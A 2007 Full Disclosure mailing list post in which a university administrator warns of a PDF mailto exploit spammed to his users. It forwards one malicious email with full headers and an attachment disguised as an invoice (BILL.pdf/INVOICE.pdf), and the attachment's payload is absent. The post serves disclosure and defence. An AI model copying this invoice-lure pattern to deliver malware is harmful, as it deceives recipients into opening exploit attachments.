Full Disclosure mailing list archives
PDF mailto exploit in the wild
From: Paul Szabo <psz () maths usyd edu au>
Date: Tue, 23 Oct 2007 22:18:52 +1000
In case you are interested... messages like the following were spammed to my users tonight.

Cheers,

Paul Szabo   psz () maths usyd edu au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

---
From sabansal1 () gmail com Tue Oct 23 18:20:46 2007
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.187])
    by london.ucc.usyd.edu.au (Postfix) with ESMTP id 17D582CAC1E
    for <tang () maths usyd edu au>; Tue, 23 Oct 2007 18:20:13 +1000 (EST)
Received: by nf-out-0910.google.com with SMTP id b2so1929536nfb
    for <tang () maths usyd edu au>; Tue, 23 Oct 2007 01:20:12 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
    d=gmail.com; s=beta;
    h=domainkey-signature:received:received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from;
    bh=RBeyhq9knF4zOhfDArq39Bm0/FWUFdutXHfudq1gwxE=;
    b=Qs8RvpCyO4UBVRo3N73MXad3ZQWzfT/6L1+snsI7Ty0ZwHuynJLpIBAIcVEGGxvfs9+pB06orF5efPl7aYqq3jQBI19jZBMUE9Tcf2TndqhPmE3nIADCgUnWEP5xo5xGug2lq6coG8MfdZd6+oIYtkdCMzl6nweV1f76zYWereQ=
DomainKey-Signature: a=rsa-sha1; c=nofws;
    d=gmail.com; s=beta;
    h=received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from;
    b=h1M0bnJzcqTTj5XzB6QgMJ0ugePdD1uvgzov2kTbStB+KW9WsynewPJJlv0ml/ILNka98867Gm2QrvL+2V5esH7Flnm5EJXpMxDSwiSv84SExd7TZFxdAsy2tYd2eiQ+Wy2Z6SlaLdZdbQv27sJ8tdN9QGNxBFWyYotdY4LwH7Y=
Received: by 10.82.112.3 with SMTP id k3mr5564785buc.1193127611679;
    Tue, 23 Oct 2007 01:20:11 -0700 (PDT)
Received: from ?12.206.143.237? ( [12.206.143.237])
    by mx.google.com with ESMTPS id k7sm6753182nfh.2007.10.23.01.20.06
    (version=SSLv3 cipher=OTHER);
    Tue, 23 Oct 2007 01:20:10 -0700 (PDT)
Message-ID: <G9THMfvCFEH0Ii.362DBDDF78@VLA18BS>
To: <andrewadams2650 () hotmail com>
Subject: STATEMET indigene
Date: Tue, 23 Oct 2007 08:11:47 +0000
MIME-Version: 1.0
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Thread-Index: leRJrPkueCIQWNOdN8y1PxNCM0wkvbPn8IKv
Content-type: multipart/mixed;
    boundary="----=_NextPart_000_00F6_04BCC8AB.87205748"
From: Gilbert <sabansal1 () gmail com>
X-PMX-Version: USyd20070806 5.3.3.310218, Antispam-Engine: 2.5.2.311128, Antispam-Data: 2007.10.23.5823
X-PerlMx-Spam: Gauge=IIIIIII, Probability=7%, Report='PDF_ATTACHED_2 0, PDF_SIZE_0_10K 0, __ATTACHMENT_SIZE_0_10K 0, __CT 0, __CTYPE_HAS_BOUNDARY 0, __CTYPE_MULTIPART 0, __FROM_GMAIL 0, __HAS_MSGID 0, __HAS_X_MAILER 0, __HELO_GMAIL 0, __MIME_VERSION 0, __RDNS_GMAIL 0, __SANE_MSGID 0, __USER_AGENT_MS_GENERIC 0, __pbl.spamhaus.org_TIMEOUT , __sbl.spamhaus.org_TIMEOUT '
Content-Length: 5618
Status: R

------=_NextPart_000_00F6_04BCC8AB.87205748
Content-Type: text/plain; charset="Windows-1251"
Content-Transfer-Encoding: 7bit

fanner ctenoid varment

------=_NextPart_000_00F6_04BCC8AB.87205748
Content-type: application/octet-stream; name="BILL.pdf"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="INVOICE.pdf"

------=_NextPart_000_00F6_04BCC8AB.87205748--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/